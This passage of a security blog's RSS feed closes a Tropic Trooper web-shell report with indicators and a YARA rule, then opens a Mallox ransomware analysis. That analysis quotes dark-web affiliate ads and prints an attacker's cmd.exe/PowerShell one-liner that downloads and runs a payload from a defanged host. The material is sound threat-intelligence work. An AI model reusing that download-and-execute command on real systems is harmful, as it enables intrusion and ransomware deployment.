href="https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" target="_blank" rel="noopener">reported by ESET in 2021</a>. Some industry reports <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">link the two groups together</a>.</p><p>The following reasons led us to attribute the campaign described in this report and all the observed implants to Tropic Trooper and its associated group, FamousSparrow:</p><ul><li>Hardcoded RC4 key: the attackers tried to launch a loader previously attributed to Tropic Trooper (MD5: a213873eb55dc092ddf3adbeb242bd44), after they failed to load it from the a.bat file. They relied on a new method maintaining the same approach by using DLL search-order hijacking and used a new loader. Both samples share the same RC4 key.</li><li>Post-exploitation tools: some of the post-exploitation tools the attackers used were seen before in other attacks within the same timeframe of this campaign, in which the victims aligned with the targeted regions and industry verticals targeted by this threat group.</li><li>The code similarity between the Middle East intrusion sample and the sample found in the third-party malware repository from February 2024 (MD5: c10643b3fb304972c650e593b69faaa1): both were loading Crowdoor into memory. Also, the command-line argument “2” found in a variant related to Tropic Trooper samples is very similar to SparrowDoor “-k” switch functionality.</li></ul><h2 id="conclusion">Conclusion</h2><p>The event that made us investigate Tropic Trooper was the recurring detection of the China Chopper web shell. Following our investigation into this incident, we found more samples written by Tropic Trooper as well as third-party tools used in the post-exploitation phase. This improved insights into this threat actor’s TTPs. Notable is the discrepancy in skill set used in various stages of the attack, as well as the choices made after failure. When the actor became aware that their backdoors were detected, they tried to upload newer samples to evade detection, thereby increasing the risk of their new set of samples being detected in the near future. In the same light, the loader sequence goes to great lengths to avoid detection. However, the usage of publicly available tools such as Fscan for further exploitation of the victim’s network again highlights the discrepancy between some relatively advanced parts of their operation and the “noisier” parts.</p><p>Investigating the motives of this threat actor led us to conclude that the significance of this intrusion lies in the sighting of a Chinese-speaking actor targeting a content management platform that published studies on human rights in the Middle East, specifically focusing on the situation around Israel-Hamas conflict. Our analysis of this intrusion revealed that this entire system was the sole target during the attack, indicating a deliberate focus on this specific content.</p><p>A more detailed analysis of this campaign is available to users of our private Threat Intelligence Portal, with another upcoming report on this activity. To learn more about this report, please contact <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p><h2 id="indicators-of-compromise">Indicators of Compromise</h2><p><strong>Umbraco Webshells</strong><br /><a href="https://opentip.kaspersky.com/3F15C4431AD4573344AD56E8384EBD62/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______795309577e185eac&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3F15C4431AD4573344AD56E8384EBD62</a><br /><a href="https://opentip.kaspersky.com/78B47DDA664545542ED3ABE17400C354/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8aa40446c9cf2f75&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">78B47DDA664545542ED3ABE17400C354</a><br /><a href="https://opentip.kaspersky.com/3B7721715B2842CDFF0AB72BD605A0CE/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______788a8be9f4f2ce62&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3B7721715B2842CDFF0AB72BD605A0CE</a><br /><a href="https://opentip.kaspersky.com/868B8A5012E0EB9A48D2DAF7CB7A5D87/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bfba3c5f645fe707&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">868B8A5012E0EB9A48D2DAF7CB7A5D87</a></p><p><strong>Post-Exploitation Tools </strong><br /><a href="https://opentip.kaspersky.com/149A9E24DBE347C4AF2DE8D135AA4B76/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______92ee2938c7ef30bb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">149A9E24DBE347C4AF2DE8D135AA4B76</a><br /><a href="https://opentip.kaspersky.com/103E4C2E4EE558D130C8B59BFD66B4FB/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1bce986bfd3b9bce&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">103E4C2E4EE558D130C8B59BFD66B4FB</a><br /><a href="https://opentip.kaspersky.com/E0D9215F64805E0BFF03F4DC796FE52E/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ee976bbfb30079f0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">E0D9215F64805E0BFF03F4DC796FE52E</a><br /><a href="https://opentip.kaspersky.com/27C558BD42744CDDC9EDB3FA597D0510/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2b9b89c057adcf61&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">27C558BD42744CDDC9EDB3FA597D0510</a><br /><a href="https://opentip.kaspersky.com/4F950683F333F5ED779D70EB38CDADCF/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ff80f54f1ad5aa96&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4F950683F333F5ED779D70EB38CDADCF</a></p><p><strong>File Paths</strong>:<br />c:\sql\tools\attunitycdcoracle\x64\1033<br />c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\fc88e889\b64f0276<br />c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\5b841946\ca5a9bf5</p><p><strong>Tropic Trooper Loaders</strong><br /><a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">FD8382EFB0A16225896D584DA56C182C</a><br /><a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1DD03936BAF0FE95B7E5B54A9DD4A577</a><br /><a href="https://opentip.kaspersky.com/8A900F742D0E3CD3898F37DBC3D6E054/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82e090652b08f023&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8A900F742D0E3CD3898F37DBC3D6E054</a><br /><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">A213873EB55DC092DDF3ADBEB242BD44</a><br /><a href="https://opentip.kaspersky.com/DD7593E9BA80502505C958B9BBBF2838/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4ef4987adedc8b9c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">DD7593E9BA80502505C958B9BBBF2838</a><br /><a href="https://opentip.kaspersky.com/2C7EBD103514018BAD223F25026D4DB3/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10ebee13da5572e5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2C7EBD103514018BAD223F25026D4DB3</a><br /><a href="https://opentip.kaspersky.com/0B9AE998423A207F021F8E61B93BC849/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a12f2aae6d6a38bc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">0B9AE998423A207F021F8E61B93BC849</a><br /><a href="https://opentip.kaspersky.com/E845563BA35E8D227152165B0C3E769F/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b8215c376fe077a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">E845563BA35E8D227152165B0C3E769F</a><br /><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">A213873EB55DC092DDF3ADBEB242BD44</a></p><p><strong>Domains and IPs</strong><br /><a href="https://opentip.kaspersky.com/51.195.37.155/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______49d728baf9e97eed&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">51.195.37[.]155</a><br /><a href="https://opentip.kaspersky.com/162.19.135.182/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82b2526286a313bb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">162.19.135[.]182</a><br /><a href="https://opentip.kaspersky.com/techmersion.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______753e9a9c9a156882&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">techmersion[.]com</a></p><p><strong>Yara Rules</strong><br /><pre class="crayon-plain-tag">rule tropictrooper_umbraco_compiled_webshells {meta: description = "Rule to detect Tropic Trooper Umbraco webshells .NET sample" author = "Kaspersky" copyright = "Kaspersky" distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM" sample = "3f15c4431ad4573344ad56e8384ebd62" strings: $s1 = { 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 25 1F 0C 72 ?? ?? ?? ?? A2 25 1F 0D 72 ?? ?? ?? ?? A2 25 1F 0E 72 ?? ?? ?? ?? A2 25 1F 0F 72 ?? ?? ?? ?? A2 25 1F 10 72 ?? ?? ?? ?? A2 25 1F 11 72 ?? ?? ?? ?? A2 25 1F 12 72 ?? ?? ?? ?? A2 25 1F 13 72 ?? ?? ?? ?? A2 25 1F 14 72 ?? ?? ?? ?? A2 25 1F 15 72 ?? ?? ?? ?? A2 25 1F 16 72 ?? ?? ?? ?? A2 25 1F 17 72 ?? ?? ?? ?? A2 25 1F 18 72 ?? ?? ?? ?? A2 } condition: $s1 and filesize < 1MB}</pre>]]></content:encoded> <wfw:commentRss>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured.jpg" width="1600" height="1005"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Mallox ransomware: in-depth analysis and evolution</title> <link>https://securelist.com/mallox-ransomware/113529/</link> <comments>https://securelist.com/mallox-ransomware/113529/#respond</comments> <dc:creator><![CDATA[Fedor Sinitsyn, Yanis Zinchenko]]></dc:creator> <pubDate>Wed, 04 Sep 2024 10:00:02 +0000</pubDate> <category><![CDATA[Crimeware reports]]></category> <category><![CDATA[crimeware]]></category> <category><![CDATA[Data Encryption]]></category> <category><![CDATA[Encryption]]></category> <category><![CDATA[Mallox]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Malware-as-a-Service]]></category> <category><![CDATA[RaaS]]></category> <category><![CDATA[Ransomware]]></category><category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113529</guid> <description><![CDATA[In this report, we provide an in-depth analysis of the Mallox ransomware, its evolution, ransom strategy, encryption scheme, etc.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Mallox is a sophisticated and dangerous family of malicious software that has been causing significant damage to organizations worldwide. In 2023, this ransomware strain demonstrated an uptick in attacks, the overall number of discovered Mallox samples exceeding 700. In the first half of 2024, the malware was still being actively developed, with new versions being released several times a month, while the Mallox RaaS affiliate program advertised on dark web forums was seeking new partners. This article aims to provide a comprehensive technical overview of the ransomware and its history.</p><h2 id="background">Background</h2><p>Mallox started operating in the first half of 2021, with the first known encryptor sample discovered in May 2021. From the very beginning, this malware was used in human-operated attacks against companies and organizations. The Trojan samples were tailored to each specific victim, with the name of the target company hardcoded in the ransom notes and the extension of the encrypted files. This is why this malware strain is known under many different aliases: the Trojan was not originally named “Mallox”, and each researcher introduced their own moniker for this malware.</p><p>In order to illustrate the different names used by Mallox variants throughout the family’s existence, we parsed more than 700 samples and built a table showing the numerous extensions we found in those.</p><table width="692"><tbody><tr><td width="82"><strong>2021</strong></td><td width="83"><strong># of samples</strong></td><td width="121"><strong>2022</strong></td><td width="83"><strong># of samples</strong></td><td width="79"><strong>2023</strong></td><td width="83"><strong># of samples</strong></td><td width="80"><strong>2024 H1</strong></td><td width="83"><strong># of samples</strong></td></tr><tr><td width="82">.architek</td><td width="83">1</td><td width="121">.avast</td><td width="83">1</td><td width="79">.bitenc</td><td width="83">1</td><td width="80">.hmallox</td><td width="83">2</td></tr><tr><td width="82">.artiis</td><td width="83">1</td><td width="121">.bozon</td><td width="83">3</td><td width="79">.host</td><td width="83">1</td><td width="80">.ma1x0</td><td width="83">5</td></tr><tr><td width="82">.brg</td><td width="83">1</td><td width="121">.bozon3</td><td width="83">1</td><td width="79">.mallab</td><td width="83">223</td><td width="80">.mallox</td><td width="83">21</td></tr><tr><td width="82">.herrco</td><td width="83">1</td><td width="121">.carone</td><td width="83">1</td><td width="79">.mallox</td><td width="83">210</td><td width="80">.rmallox</td><td width="83">57</td></tr><tr><td width="82">.mallox</td><td width="83">6</td><td width="121">.consultransom</td><td width="83">2</td><td width="79">.malloxx</td><td width="83">30</td><td width="80">.tif</td><td width="83">1</td></tr><tr><td width="82">.servimo</td><td width="83">1</td><td width="121">.deviceZz</td><td width="83">1</td><td width="79">.malox</td><td width="83">63</td><td width="80"></td><td width="83"></td></tr><tr><td width="82">.tohnichi</td><td width="83">3</td><td width="121">.exploit</td><td width="83">1</td><td width="79">.maloxx</td><td width="83">8</td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.explus</td><td width="83">1</td><td width="79">.xollam</td><td width="83">7</td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.FARGO</td><td width="83">1</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.FARGO2</td><td width="83">1</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.FARGO3</td><td width="83">20</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.mallox</td><td width="83">100</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.prismchigo</td><td width="83">1</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr><tr><td width="82"></td><td width="83"></td><td width="121">.rexiaa</td><td width="83">1</td><td width="79"></td><td width="83"></td><td width="80"></td><td width="83"></td></tr></tbody></table><p>In early 2023, <a href="https://www.suspectfile.com/interview-with-mallox-ransomware-group/">SuspectFile published an interview</a> with individuals who claimed to be the threat actors behind Mallox. In the interview, the actor stated that they purchased the source code for the encryption Trojan in 2022. That might mean that it was previously operated by another group, which would explain the change in the naming pattern: from a unique name for each victim to the “Mallox” universal branding.</p><p>Most articles and blog posts refer to this strain as Mallox, Tohnichi, Fargo or TargetCompany.</p><h3 id="timeline">Timeline</h3><p>Judging by the PE timestamps in the discovered samples, which proved to be unaltered and represent the actual release date of the given sample, there were several spikes in new samples: late 2022, early 2023 and late 2023.</p><div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="interactive" data-title="01 EN Mallox data" style="min-height:;"></div><p align="center"><strong>Discovered Mallox samples by PE timestamp (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125626/01-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p><p>The number of ITW Mallox samples strongly correlates with Kaspersky Security Network (KSN) telemetry. KSN is our cyberthreat-related data processing system, which works with data consensually provided by Kaspersky users. The graph below shows spikes in unique users who encountered the Mallox ransomware in March 2023 and October 2023, which match the previous graph and indicate increased activity by the group during these periods.</p><div class="js-infogram-embed" data-id="_/kEGqxcyN2rqEUiwIaPSb" data-type="interactive" data-title="02 EN Mallox data" style="min-height:;"></div><p align="center"><strong>Mallox ransomware activity (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125518/02-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p><h3 id="raas-promotion">RaaS promotion</h3><p>A January 2023 post on the dark web forum RAMP by a user named <strong>Mallox</strong> promoted a ransomware-as-a-service affiliate program with the same name.</p><div id="attachment_113638" style="width: 801px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113638" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png" alt="The original ad for Mallox RaaS" width="791" height="695" class="size-full wp-image-113638" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01.png 791w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-300x264.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-768x675.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-398x350.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-740x650.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125747/Mallox-ransomware-01-319x280.png 319w" sizes="(max-width: 791px) 100vw, 791px" /></a><p id="caption-attachment-113638" class="wp-caption-text">The original ad for Mallox RaaS</p></div><p>The translation of the post is given below.</p><table width="680"><tbody><tr><td width="680"><em>Mallox is looking for pentesters with their own material to join the team or as partners</em></p><p><em>If you have your own material, we are ready to offer high-quality software and support</em></p><p><em>Features:</em><br /><em>– Blog</em><br /><em>– Web panel with pricing settings per client, chat, Statistics and bonuses</em><br /><em>– Encryption: elliptic-curve cryptography + ChaCha20 + many software updates made</em><br /><em>– Clean code</em></p><p><em>Terms:</em><br /><em>– 70% for you, 30% for us</em><br /><em>– 80% for you, 20% for us if you have a lot of material and large networks</em><br /><em>– Experience is key! Don’t write if you’re out to practice, don’t waste our time, there will be a selection process, we don’t accept all comers, only a limited number of partners on a long-term basis!</em><br /><em>– We will disable inactive ones over time</em><br /><em>– We don’t do business with English speakers</em></p><p><em>IM in Jabber for details: [redacted]</em></td></tr></tbody></table><p>The ad states that the RaaS owners are looking for “pentesters”, i.e. affiliates willing to search for and infiltrate companies. Priority is given to those affiliates that have already obtained unauthorized access to a lot of organizations and/or large networks. Such partners are offered 80% of the profits, while those without a substantial number of readily available victim networks are invited to work for 70% of the ransom.</p><p>The poster emphasizes that they are looking only for long-term relationships with experienced affiliates. They are not interested in wasting their time on novice cybercriminals and do not provide any training. The RaaS representative also stresses that they do not work with English-speaking affiliates.</p><p>Another RAMP post by the same user in September 2023 said the group was willing to purchase access credentials to victim networks, most likely to launch ransomware attacks on their own.</p><table width="680"><tbody><tr><td width="680"><em>Market – Access (SSH/RDP/VNC/Shell) / Ищем поставщика доступов.Сотрудничество\Реализация.</em></p><p><em>Заберем доступы под реализацию. Условия сортудничества – оговариваются лично.</em><br /><em>– Интересуют доступы: фортики, циско впн и другие.</em><br /><em>– Revenue</em><em> от 10kk</em><em>+</em><br /><em>– Юзер в домене.</em><br /><em>– AD.</em><br /><em>– Гео US/CA/AU/UK/DE.</em><br /><em>– Не интересуют: EDU</em><em>/GOV</em><br /><em>– Тематика рассматривается индивидуально, госпитали и учебные заведения не иинтересуют.</em><br /><em>– Работаем честно и четко, поставщик будет иметь доступ к панели и чатам и видеть все на свои глаза.</em><br /><em>– Если будет постоянный поток ТОП мата , готовы предоставить вам лучшие условия и забрать к себе в приват.</em></p><p><em>Контакты джаббер: [redacted]</em></td></tr><tr><td width="680"><em>Market – Access (SSH/RDP/VNC/Shell) / Looking for an access provider. Partnership/Purchases.</em></p><p><em>Will buy access credentials for use. Terms to be negotiated in private.</em><br /><em>– Interested in access to Fortinet VPN, Cisco VPN, etc.</em><br /><em>– Revenue from 10kk+</em><br /><em>– Domain user</em><br /><em>– AD</em><br /><em>– Geo: US/CA/AU/UK/DE</em><br /><em>– Not interested in: EDU/GOV</em><br /><em>– Industries considered on case-by-case basis. Not interested in hospitals or schools.</em><br /><em>– We do business honestly and transparently: the seller will have access to the panel and chat to see it all with their own eyes.</em><br /><em>– If there is a constant flow of TOP material, we are ready to give you the best terms and offer you a private deal.</em></p><p><em>Jabber contact: [redacted]</em></td></tr></tbody></table><p>This post sheds further light on the Mallox RaaS creators’ business model. They look for wealthy victim companies with revenue of $10 million or more in any of the five listed countries. They also aim to avoid attacking educational, governmental and healthcare organizations.</p><h3 id="statistics-on-the-raas-affiliates">Statistics on the RaaS affiliates</h3><p>By analyzing Mallox samples, we were able to determine that starting in 2022, the developers added C&C reporting to their malware. This sends information about each infected computer, but more interestingly, it also appends an affiliate ID string to the Trojan’s HTTP request. We extracted these affiliate IDs from the samples we had obtained and built a data model, which allowed us to investigate the distribution of samples across partners throughout the evolution of the RaaS program.</p><table width="426"><tbody><tr><td width="310"><strong>Affiliate ID string</strong></td><td width="116"><strong># of samples</strong></td></tr><tr><td width="310">admin</td><td width="116">72</td></tr><tr><td width="310">amigosbos9k</td><td width="116">55</td></tr><tr><td width="310">bitenc</td><td width="116">1</td></tr><tr><td width="310">bloodbeard</td><td width="116">2</td></tr><tr><td width="310">caneddy</td><td width="116">1</td></tr><tr><td width="310">grinder</td><td width="116">10</td></tr><tr><td width="310">hiervos</td><td width="116">251</td></tr><tr><td width="310">last</td><td width="116">1</td></tr><tr><td width="310">lastsmile</td><td width="116">2</td></tr><tr><td width="310">leandra56</td><td width="116">1</td></tr><tr><td width="310">loader</td><td width="116">7</td></tr><tr><td width="310">maestro</td><td width="116">170</td></tr><tr><td width="310">mallox</td><td width="116">2</td></tr><tr><td width="310">Neuroframe</td><td width="116">11</td></tr><tr><td width="310">panda</td><td width="116">42</td></tr><tr><td width="310">samuel</td><td width="116">13</td></tr><tr><td width="310">truetl</td><td width="116">4</td></tr><tr><td width="310">UserHelp</td><td width="116">4</td></tr><tr><td width="310">vampir</td><td width="116">65</td></tr></tbody></table><p>We also analyzed the changes in the distribution of samples across the most active affiliates by year. These changes indicate that after the launch of the RaaS program, it rapidly expanded to reach 16 active affiliates operating 500 samples, and then shrank in the first half of 2024. At the time of writing this post, we observed a total of 19 Mallox RaaS partners.</p><p>Also notable is the fact that the original five affiliates that were working with Mallox in 2022 continue to do so in 2024. This might indicate that the core subscribers seem to be satisfied with the program’s terms and prefer it to other options available on the darknet market.</p><p>Please note that at the time of writing this report, the data for 2024 was limited to H1.</p><div id="attachment_113628" style="width: 1405px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113628" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png" alt="Mallox samples by affiliate ID" width="1395" height="811" class="size-full wp-image-113628" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02.png 1395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-300x174.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-1024x595.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-768x446.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-602x350.png 602w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-740x430.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-482x280.png 482w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125445/Mallox-ransomware-02-800x465.png 800w" sizes="(max-width: 1395px) 100vw, 1395px" /></a><p id="caption-attachment-113628" class="wp-caption-text">Mallox samples by affiliate ID</p></div><h2 id="typical-infection-scenario">Typical infection scenario</h2><p>Mallox affiliates are free to choose their methods of compromising victims’ networks. Some of the campaigns we observed involved sending spam with malicious attachments. In another <a href="https://www.secrss.com/articles/63100">recent campaign in China</a>, the threat actors allegedly exploited a vulnerability in the IP-Guard software for initial access.</p><p>While analyzing KSN telemetry, we determined that one of the most common infection vectors used by the attackers was penetrating internet-facing MS SQL or PostgreSQL servers. To achieve this, the threat actors typically either exploit RCE vulnerabilities, such as <a href="https://www.cve.org/CVERecord?id=CVE-2019-1068">CVE-2019-1068</a> or <a href="https://www.cve.org/CVERecord?id=CVE-2020-0618">CVE-2020-0618</a> in unpatched MS SQL server installations, or carry out brute-force or dictionary attacks.</p><div id="attachment_113627" style="width: 1067px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113627" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png" alt="Typical Mallox attack pattern" width="1057" height="903" class="size-full wp-image-113627" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03.png 1057w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-1024x875.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-768x656.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-410x350.png 410w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-740x632.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-328x280.png 328w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125426/Mallox-ransomware-03-800x683.png 800w" sizes="(max-width: 1057px) 100vw, 1057px" /></a><p id="caption-attachment-113627" class="wp-caption-text">Typical Mallox attack pattern</p></div><p>The compromised MS SQL server process executes a command that creates a PowerShell script and launches it using the sqlps command, then starts the first stage portable executable (PE) payload downloaded by the PowerShell script.</p><pre class="crayon-plain-tag">cmd.exe /C "echo $cl = New-Object System.Net.WebClient &gt;%APPDATA%\alta.ps1 &amp; echo $cl.DownloadFile("hxxp[:]//&lt;ip address&gt;/scavenger.exe", "%APPDATA%\box.bat") &gt;&gt; %APPDATA%\alta.ps1 &amp; sqlps -ExecutionPolicy Bypass %APPDATA%\alta.ps1 &amp; WMIC process call create "%APPDATA%\box.bat""</pre> </p><p>This first-stage PE payload in Mallox attacks is typically either a sample of the Remcos RAT subsequently used by the operators for remote access to the compromised network, or a .NET downloader that automatically fetches the second-stage PE payload, which is the encryption Trojan. The .NET downloaders used in this scheme are mostly simplistic and implement a procedure to download a binary from the hardcoded URL, decrypt it with a XOR loop and execute it in memory.</p><h2 id="analysis">Analysis</h2><p>Several hundred different samples have been found since the first version of Mallox was discovered. Mallox developers have continued to improve the ransomware and add new features. For convenience, we divided these samples into several different versions. Below, we will perform a detailed analysis of the first and the latest known versions. Moreover, we will provide a comparison table with other known versions to show how the Trojan has evolved, what features have been added and how the cryptographic scheme has changed.</p><h3 id="earliest-known-mallox-version-9b772efb921de8f172f21125dd0e0ff7-v1">Earliest known Mallox version (9b772efb921de8f172f21125dd0e0ff7, v1)</h3><p>This sample was discovered in 